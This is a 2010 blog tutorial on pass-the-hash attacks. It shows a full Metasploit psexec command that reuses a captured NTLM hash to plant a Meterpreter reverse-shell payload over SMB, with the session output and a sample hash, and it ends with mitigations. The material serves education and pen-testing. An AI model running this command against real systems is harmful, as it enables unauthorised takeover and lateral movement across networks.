Sunday 10 October 2010

Hacking techniques: Pass the hash (PTH) with Metasploit

This article describes how to use Metasploit to attack and compromise systems by reusing captured password hashes - using the "Pass the hash" (PTH) technique.

These techniques should only be used for legitimate and legal purposes, i.e. for penetration testing, education and research.

When a system is compromised with a Administrative or System level of access, an attacker will often take a copy of the password hashes for off-line hash-cracking. There are multiple reasons for doing this, but especially because of password reuse.

During a penetration test, it may be useful to demonstrate that password reuse and "single sign-on" could be a huge weakness in an enterprise. If one system is compromised, and the password hashes cracked, then all systems that have the same passwords may be easily accessible.

However, what if the passwords that have been chosen were very strong, and are not crackable in a realistic time-frame?

For Windows systems, all is not lost from an attacker's perspective, because even if the hashes are not crackable, these same password hashes can be used for authentication, either to the same previously compromised system (for easy access) or to other systems that share the same password.

Imagine that during a pen-test you have compromised a Windows system using some kind of exploit and obtained a system level shell or Meterpreter session. From here it would be relatively simple to upload a tool or use Meterpreter to extract the local password hashes.

From these hashes, there may be several useful accounts where you may want to gain the password. For example:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd:::

From this extracted hash, we can see that the LM hash portion is blank (aad3b435b51404ee is repeated twice in the first hash) and this suggests a strong password is in use.

Having found that the NTLM hash is not crackable in a reasonable time, by brute force or rainbow tables, we may abandon cracking the hash as unfeasible. However, we could reuse the password hash "as is" to re-authenticate to the Windows system using SMB.

Metasploit has a cool tool "exploit/windows/smb/psexec" which authenticates using SMB, uploads and runs a payload. In the following example we use Meterpreter as the payload:

/pentest/exploits/framework3/msfcli exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.32 LPORT=443 RHOST=192.168.1.20 SMBUser=Administrator SMBPass=aad3b435b51404eeaad3b435b51404ee:7d3f11711c610f013c06959a5e98f2fd E 

[*] Please wait while we load the module tree... 
[*] Started reverse handler on 192.168.1.32:443 
[*] Connecting to the server... 
[*] Authenticating as user 'Administrator'... 
[*] Uploading payload... 
[*] Created \CpdYVAFa.exe... 
[*] Binding to 367abb81-9844-35f1 ad32-98f038001003:2.0@ncacn_np:192.168.1.20[\svcctl] ... 
[*] Bound to 367abb81-9844-35f1 ad32-98f038001003:2.0@ncacn_np:192.168.1.20[\svcctl] ... 
[*] Obtaining a service manager handle... 
[*] Creating a new service (eHIqItmA - "MhEHHIQNUFjnuuJarbnQlnIjpA")... 
[*] Closing service handle... 
[*] Opening service... 
[*] Starting the service... 
[*] Removing the service... 
[*] Sending stage (748544 bytes) to 192.168.1.20 
[*] Closing service handle... 
[*] Deleting \CpdYVAFa.exe... 
[*] Meterpreter session 1 opened (192.168.1.32:443 -> 192.168.1.20:1090)

meterpreter >

So there we go, we have regained Administrative access to the system again, simply by reusing the password hash.

This attack could now be used against any system that has an account with the same password (and port 445 open).

This shows that it is not a good idea to reuse administrator passwords in corporate environments. Imagine you roll-out 2000 desktops, all with the same "strong" local Administrator password. If the hash is either sniffed off the network, or obtained from a single compromised system, then all these desktops are at risk from direct exploitation using this technique.

It may be, that the CEO, CFO and HR Directors PCs all have the same local Administrator password as any other machine on the network. In which case, if any machines are compromised on the network, it puts all these systems (and any data on these systems) at risk from a trivial exploit.

Mitigations are defense-in-depth strategies such as:
  • Choosing strong and unique Administrator passwords
  • Intrusion detection and Network monitoring tools
  • Network segmentation
  • On-box firewalls

2 comments: